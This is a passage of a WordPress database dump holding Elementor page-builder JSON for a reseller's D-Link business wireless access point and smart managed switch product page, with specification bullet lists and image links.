spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"127\",\"right\":\"127\",\"bottom\":\"127\",\"left\":\"127\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7191,3356,'_elementor_version','2.5.14'),(7192,3356,'_elementor_edit_mode','builder'),(7195,3357,'_wp_page_template','template-fullwidth.php'),(7196,3357,'_elementor_template_type','post'),(7197,3357,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"54\",\"right\":\"54\",\"bottom\":\"54\",\"left\":\"54\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access 